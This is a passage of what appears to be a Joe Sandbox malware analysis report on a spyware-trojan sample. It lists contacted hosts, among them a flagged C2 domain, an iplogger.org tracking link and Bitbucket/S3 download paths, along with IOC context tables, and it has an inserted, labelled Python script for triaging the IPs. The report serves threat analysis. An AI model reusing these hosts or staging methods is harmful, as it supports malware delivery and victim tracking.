http://www.fontbureau.com/designers/frere-jones.html | 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmp, 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.219879289.0000000006011000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing | 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmp | false | - | high
https://support.google.com/chrome/?p=plugin_shockwave | srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/p | 1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://forms.rea | 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.org/1Bwjj7%A_AppData% | Nb2HQZZDIf.exe, 00000000.00000003.305082174.00000000008E8000.00000004.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/f | 1234.exe, 00000002.00000003.216218362.0000000006011000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.jiyu-kobo.co.jp/b | 1234.exe, 00000002.00000003.216270942.0000000006011000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
https://aui-cdn.atlassian.com | Nb2HQZZDIf.exe, 00000000.00000002.307504905.0000000002D90000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmp | false | - | high
https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/80e8feaa-7504- | Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp | false | - | high
http://tempuri.org/Endpoint/EnvironmentSettingsti | 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
https://support.google.com/chrome/?p=plugin_wmp | 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | false | - | high

                                                                                                              Contacted IPs


                                                                                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.217.80.20 | unknown | United States | 16509 | AMAZON-02 (US) | false
5.149.255.203 | unknown | United Kingdom | 59711 | HZ-NL-AS (GB) | false
104.25.233.53 | is.gd | United States | 13335 | CLOUDFLARENET (US) | false
212.224.105.105 | yspasenana.xyz | Germany | 44066 | DE-FIRSTCOLOwwwfirst-colonet (DE) | true
104.192.141.1 | bitbucket.org | United States | 16509 | AMAZON-02 (US) | false
52.216.94.27 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02 (US) | false
88.99.66.31 | iplogger.org | Germany | 24940 | HETZNER-AS (DE) | false
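Added example, not part of the Joe Sandbox report or its tooling: a small Python parser that takes the Public contacted-IP rows exactly as the text export above prints them (three lines per contact, with domain and country and with ASN, ASN name, country code and malicious flag glued together), splits the fused fields, and sorts the contacts into the sandbox-flagged C2 candidate, shared cloud/CDN tenant space, and hosts worth a manual look. The country list and the set of "shared" ASNs are assumptions taken from this one report; extend them for other exports.

```python
"""Triage the Contacted IPs table of a Joe Sandbox text export into IOC records.

Added example for this page; it is not Joe Sandbox code. The rows below are
copied from the report's Public table as the text export prints them:
three lines per contact (IP / domain+country / ASN+name+country-code+malicious).
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Copied from the report above (the seven public contacts).
REPORT_ROWS = """\
52.217.80.20
unknownUnited States
16509AMAZON-02USfalse
5.149.255.203
unknownUnited Kingdom
59711HZ-NL-ASGBfalse
104.25.233.53
is.gdUnited States
13335CLOUDFLARENETUSfalse
212.224.105.105
yspasenana.xyzGermany
44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
104.192.141.1
bitbucket.orgUnited States
16509AMAZON-02USfalse
52.216.94.27
s3-w.us-east-1.amazonaws.comUnited States
16509AMAZON-02USfalse
88.99.66.31
iplogger.orgGermany
24940HETZNER-ASDEfalse
"""

# Country names seen in this report. The export glues them onto the domain with
# no separator, so they are matched as suffixes (assumption: extend for other reports).
COUNTRIES = ("United States", "United Kingdom", "Germany")

# ASN line: AS number, free-form ASN name, two-letter country code, malicious flag.
ASN_LINE = re.compile(r"^(?P<asn>\d+)(?P<name>.+?)(?P<cc>[A-Z]{2})(?P<mal>true|false)$")
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

# Large cloud/CDN ASNs where one IP is shared tenant space, so an IP block is
# noisy and the URL or hostname is the better indicator (assumption: the two
# such ASNs that appear in this report, Amazon and Cloudflare).
SHARED_ASNS = frozenset({16509, 13335})


@dataclass(frozen=True)
class Contact:
    ip: str
    domain: str | None      # None where the report printed "unknown"
    country: str
    asn: int
    asn_name: str
    malicious: bool


def split_domain_country(field: str) -> tuple[str | None, str]:
    """'is.gdUnited States' -> ('is.gd', 'United States'); 'unknown...' -> (None, ...)."""
    for country in COUNTRIES:
        if field.endswith(country):
            domain = field[: -len(country)]
            return (None if domain == "unknown" else domain), country
    raise ValueError(f"no known country suffix in {field!r}")


def parse_contacts(text: str) -> list[Contact]:
    """Parse the three-line groups of the Public table into Contact records."""
    rows = [line.strip() for line in text.splitlines() if line.strip()]
    if len(rows) % 3:
        raise ValueError("table is not a whole number of three-line rows")
    contacts: list[Contact] = []
    for i in range(0, len(rows), 3):
        ip, dom_cc, asn_line = rows[i : i + 3]
        if not IPV4.match(ip):
            raise ValueError(f"expected IPv4 address, got {ip!r}")
        domain, country = split_domain_country(dom_cc)
        m = ASN_LINE.match(asn_line)
        if m is None:
            raise ValueError(f"unparseable ASN line {asn_line!r}")
        contacts.append(Contact(ip, domain, country, int(m["asn"]),
                                m["name"], m["mal"] == "true"))
    return contacts


def triage(contacts: list[Contact]) -> dict[str, list[Contact]]:
    """Bucket contacts: sandbox-flagged C2 candidates, shared cloud/CDN space
    (block the URL or hostname rather than the IP), and the rest for review."""
    flagged = [c for c in contacts if c.malicious]
    shared = [c for c in contacts if not c.malicious and c.asn in SHARED_ASNS]
    review = [c for c in contacts if not c.malicious and c.asn not in SHARED_ASNS]
    return {"flagged": flagged, "shared_infra": shared, "review": review}


if __name__ == "__main__":
    for bucket, items in triage(parse_contacts(REPORT_ROWS)).items():
        print(bucket)
        for c in items:
            print(f"  {c.ip:16} {c.domain or '-':30} AS{c.asn} {c.asn_name} ({c.country})")
```

On this report the only flagged contact is 212.224.105.105 (yspasenana.xyz, AS44066); the S3, Bitbucket and is.gd addresses land in the shared bucket, and the two remaining hosts (the unknown-domain 5.149.255.203 on AS59711 and iplogger.org on Hetzner) are left for an analyst to decide on.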

                                                                                                              Private

                                                                                                              IP
                                                                                                              192.168.2.1

                                                                                                              General Information

                                                                                                              Joe Sandbox Version:33.0.0 White Diamond
                                                                                                              Analysis ID:452456
                                                                                                              Start date:22.07.2021
                                                                                                              Start time:11:37:09
                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                              Overall analysis duration:0h 13m 5s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:light
                                                                                                              Sample file name:Nb2HQZZDIf (renamed file extension from none to exe)
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:25
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • HDC enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@9/60@15/8
                                                                                                              EGA Information:Failed
                                                                                                              HDC Information:
                                                                                                              • Successful, ratio: 2.4% (good quality ratio 1.2%)
                                                                                                              • Quality average: 36.8%
                                                                                                              • Quality standard deviation: 41.2%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 72%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 0
                                                                                                              Cookbook Comments:
                                                                                                              • Adjust boot time
                                                                                                              • Enable AMSI
                                                                                                              Warnings:
                                                                                                              Show All
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                              • TCP Packets have been reduced to 100
                                                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.147.198.201, 104.42.151.234, 20.82.209.104, 23.211.4.86, 40.112.88.60, 173.222.108.210, 173.222.108.226, 20.82.210.154, 80.67.82.235, 80.67.82.211, 104.26.12.31, 172.67.75.172, 104.26.13.31
                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

Time | Type | Description
11:37:57 | API Interceptor | 1x Sleep call for process: Nb2HQZZDIf.exe modified
11:39:07 | API Interceptor | 87x Sleep call for process: 1234.exe modified
11:39:49 | API Interceptor | 69x Sleep call for process: srvs.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

Match | Associated Sample Name / URL | Detection
104.25.233.53 | plagin.exe | malicious
104.25.233.53 | remittance details.docx | malicious
104.25.233.53 | Bnp Paribas SWIFT.xlsx | malicious
104.25.233.53 | SWIFT COPY.docx | malicious
104.25.233.53 | INV2104_01.docx | malicious
104.25.233.53 | 2af49a1a_by_Libranalysis.docx | malicious
104.25.233.53 | RFQ - 0421.docx | malicious
104.25.233.53 | Evaluation quoter.docx | malicious
104.25.233.53 | NEW ORDER.xlsx | malicious
104.25.233.53 | Shipping documents.xlsx | malicious
104.25.233.53 | MT-808-00021952.xlsx | malicious
104.25.233.53 | NOA_-_CMACGM_-_Booking_Confirmation_0GM3AE1MA_4080215257433000.xlsx | malicious
104.25.233.53 | UniCredit Remittances.xlsx | malicious
104.25.233.53 | Shipping documents.xlsx | malicious
104.25.233.53 | presupuesto.xlsx | malicious
104.25.233.53 | scan-remittance-slip.xlsx | malicious
104.25.233.53 | Shipping-Documents.xlsx | malicious
104.25.233.53 | PRC-20-518 ORIGINAL.xlsx | malicious
104.25.233.53 | IN18663Q0031139I.xlsx | malicious
104.25.233.53 | PRC-20-518 ORIGINAL.xlsx | malicious
104.192.141.1 | r3xwkKS58W.exe | malicious
104.192.141.1 | P58w6OezJY.exe | malicious
104.192.141.1 | lpaBPnb1OB.exe | malicious
104.192.141.1 | 2aJ9QdIdFE.exe | malicious
104.192.141.1 | EA4LughYnY.exe | malicious
104.192.141.1 | etSPaoVcAD.exe | malicious
104.192.141.1 | kxQkjkU9DO.exe | malicious
104.192.141.1 | 9CMjcYFBxo.exe | malicious
104.192.141.1 | JvlwIeO09R.exe | malicious
104.192.141.1 | pEIro35JRJ.exe | malicious
104.192.141.1 | AEdU8eJHgN.exe | malicious
104.192.141.1 | YIrI3VuV0W.exe | malicious
104.192.141.1 | 8zsiEeSTzI.exe | malicious
104.192.141.1 | k6sy0WOByI.exe | malicious
104.192.141.1 | kvAgGyJqYT.exe | malicious
104.192.141.1 | A7DmPhc0bs.exe | malicious
104.192.141.1 | Coupon-Codes-2021.doc | malicious
104.192.141.1 | k53f1UmAkl.exe | malicious
104.192.141.1 | q7jxy6gZMb.exe | malicious
104.192.141.1 | D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe | malicious

                                                                                                                                                                                              Domains

Match | Associated Sample Name / URL | Detection | Context
bitbucket.org | HryPYPQtcg.exe | malicious | 104.192.141.1
bitbucket.org | oOoVvuAQS9.exe | malicious | 104.192.141.1
bitbucket.org | 6FORhr7lC1.exe | malicious | 104.192.141.1
bitbucket.org | 2aJ9QdIdFE.exe | malicious | 104.192.141.1
bitbucket.org | EA4LughYnY.exe | malicious | 104.192.141.1
bitbucket.org | etSPaoVcAD.exe | malicious | 104.192.141.1
bitbucket.org | kxQkjkU9DO.exe | malicious | 104.192.141.1
bitbucket.org | 9CMjcYFBxo.exe | malicious | 104.192.141.1
bitbucket.org | JvlwIeO09R.exe | malicious | 104.192.141.1
                                                                                                                                                                                              pEIro35JRJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              AEdU8eJHgN.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              YIrI3VuV0W.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              kvAgGyJqYT.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              I2VQzf34i3.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              A7DmPhc0bs.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              Coupon-Codes-2021.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              k53f1UmAkl.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              q7jxy6gZMb.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              s3-w.us-east-1.amazonaws.comMachine Service.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.216.249.124
                                                                                                                                                                                              Machine Service.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.102.108
                                                                                                                                                                                              #Ud83d#Udd0ajs_msg_ 3pm.htmlGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.11.68
                                                                                                                                                                                              HryPYPQtcg.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.129.57
                                                                                                                                                                                              6FORhr7lC1.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.202.41
                                                                                                                                                                                              2aJ9QdIdFE.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.162.201
                                                                                                                                                                                              EA4LughYnY.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.161.9
                                                                                                                                                                                              etSPaoVcAD.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.164
                                                                                                                                                                                              kxQkjkU9DO.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.216.128.43
                                                                                                                                                                                              9CMjcYFBxo.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.216.137.244
                                                                                                                                                                                              JvlwIeO09R.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.130.249
                                                                                                                                                                                              pEIro35JRJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.104.164
                                                                                                                                                                                              AEdU8eJHgN.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.90.84
                                                                                                                                                                                              YIrI3VuV0W.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.216.171.179
                                                                                                                                                                                              8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.140.209
                                                                                                                                                                                              k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.101.132
                                                                                                                                                                                              I2VQzf34i3.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.83.220
                                                                                                                                                                                              k53f1UmAkl.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.10.252
                                                                                                                                                                                              D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.164.225
                                                                                                                                                                                              D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.216.186.35

ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-02US | ovLjmo5UoE | malicious | 63.34.62.30
AMAZON-02US | o3ZUDIEL1v | malicious | 18.151.13.78
AMAZON-02US | D1dU3jQ1II | malicious | 34.208.242.240
AMAZON-02US | mal.exe | malicious | 52.58.78.16
AMAZON-02US | vjsBNwolo9.js | malicious | 76.223.26.96
AMAZON-02US | r3xwkKS58W.exe | malicious | 52.217.135.113
AMAZON-02US | A7X93JRxhp | malicious | 54.151.74.14
AMAZON-02US | 1Ds9g7CEsp | malicious | 13.208.189.104
AMAZON-02US | XuQRPW44hi | malicious | 54.228.23.118
AMAZON-02US | Taf5zLti30 | malicious | 44.231.84.110
AMAZON-02US | 5qpsqg7U0G | malicious | 34.219.219.82
AMAZON-02US | LyxN1ckWTW | malicious | 18.139.244.68
AMAZON-02US | ZlvFNj.dll | malicious | 3.16.22.120
AMAZON-02US | U4r9W64doy | malicious | 13.245.89.196
AMAZON-02US | C4PozjQdGE | malicious | 18.135.214.121
AMAZON-02US | kb5IbEJU8c | malicious | 18.227.43.189
AMAZON-02US | MD5OxTSc6i | malicious | 18.149.163.217
AMAZON-02US | P58w6OezJY.exe | malicious | 52.217.198.209
AMAZON-02US | c51w5YSYdO | malicious | 108.146.155.164
AMAZON-02US | meu.agendamento.msi | malicious | 52.95.165.102
HZ-NL-ASGB | r3xwkKS58W.exe | malicious | 185.117.90.215
HZ-NL-ASGB | P58w6OezJY.exe | malicious | 185.117.90.215
HZ-NL-ASGB | BCuIfAa4vg.exe | malicious | 185.117.90.215
HZ-NL-ASGB | Tkq1Iki4wh.exe | malicious | 185.117.90.158
HZ-NL-ASGB | o2fAkrQ43w.exe | malicious | 79.141.165.169
HZ-NL-ASGB | xSdXan6nb2.exe | malicious | 79.141.165.169
HZ-NL-ASGB | c1w8HZxJj6.exe | malicious | 79.141.165.169
HZ-NL-ASGB | bdnWx5yC4M.exe | malicious | 79.141.165.169
HZ-NL-ASGB | Ss3Lb0DFrp.exe | malicious | 79.141.165.169
HZ-NL-ASGB | jDnYtpTxyZ.exe | malicious | 185.117.90.241
HZ-NL-ASGB | sahiba_5.exe | malicious | 185.117.90.241
HZ-NL-ASGB | feTK7Wsxk7.exe | malicious | 185.117.91.226
HZ-NL-ASGB | 3CHp0s9VCm.exe | malicious | 185.117.91.226
HZ-NL-ASGB | LgiKWELV2P.exe | malicious | 185.117.91.226
HZ-NL-ASGB | 3bc9d55e74d95a7e5a8e9a6ca8e3c625f73ec89e19278.exe | malicious | 185.117.90.60
HZ-NL-ASGB | ExHNIXd73f.exe | malicious | 185.117.90.60
HZ-NL-ASGB | oPxwg2ab02.exe | malicious | 185.117.91.226
HZ-NL-ASGB | 72x2KSc4L9.exe | malicious | 185.117.91.226
HZ-NL-ASGB | jjbxg8kh5X.exe | malicious | 5.149.249.178
HZ-NL-ASGB | ashleyx.exe | malicious | 79.141.164.23

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eLXjXpsYbvS.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              eIdBaSWMpQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              yGB5ewTowK.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              4QKHQR82Xt.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              ySZpdJfqMO.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              AE0609753775B1F991A084C8C8437B4BE9F3692F7505D.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              Drawing for New Purchase Order.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              tMHbLQqogO.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              Software updated v2.6.0.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              DTG_TOKEN_GENERATOR.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              CSyG3zNcwS.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              BrCi5pJr8J.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              cheat.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              F7C32157917B29E1AE8A009C4DFD7091CADB727B0C848.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              WR0MTpWkYC.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              TIJYYlYJpv.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              IZikrB0LOItfOQt.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              2fPVqukqcm.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              Img 673t5718737.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              265.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 52.217.80.20
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19#U00e2_#U00e2_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              41609787.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              B5xK9XEvzO.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              RsEvjI1iTt.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              ORD.pptGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              39pfFwU3Ns.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              47a8af.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              Comprobante1.vbsGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              ZlvFNj.dllGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              QT2kxM315B.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              4QKHQR82Xt.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              Convert HEX uit phishing mail.htmGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              #U2706_#U260e_Play _to _Listen.htmGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              192-3216-Us.gt.com.htmlGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              N41101255652.vbsGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              FILE_2932NH_9923.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              RDlkHCLRxE.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              #U2706_#U260e_Play _to _Listen.htm (verdict: malicious)
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
